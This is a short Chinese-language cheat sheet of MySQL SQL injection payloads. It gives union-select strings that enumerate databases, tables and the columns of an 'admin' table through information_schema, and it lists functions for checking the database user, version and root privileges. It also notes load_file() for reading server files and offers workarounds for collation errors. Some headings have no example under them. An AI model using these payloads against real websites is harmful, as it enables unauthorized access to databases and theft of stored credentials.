================================
and 1=2
查看mysql版本:
具体确定版本号mysql:
/*!50000%20s*/
查看是不是root权限:
判断语句查询的字段数:
联合查询(4.0以上的版本支持):union select 1,2,3,4,5,6,7,8,9,10 from admin
相关函数: system_user()系统用户名
user()
session_user()连接数据库的用户名
database()
version()
load_file()
@@datadir
@@basedir
version_complie_os操作系统
判断如果有root权限,可以使用load_file()
=====================================
(1)查询数据库用户:
(2)查询所有数据库:
and 1=2 union select GROUP_CONCAT(schema_name) from information_schema.schemata
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))t
(3)查询所有表名:
and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()
and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t
(4)查询指定表的所有列:
and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()
and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t
注意:之所以限定database是因为可能存在同名表(位于另外数据库)。
当注射后页面显示:
(1)Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
可以使用convert()函数,如:
似乎可以使用unhex(hex())方式
(2)Illegal mix of collations for operation 'UNION'
使用hex函数,如:
参考:http://www.07net01.com/security/sqljibenzhuruyuju_585433_1379245164.html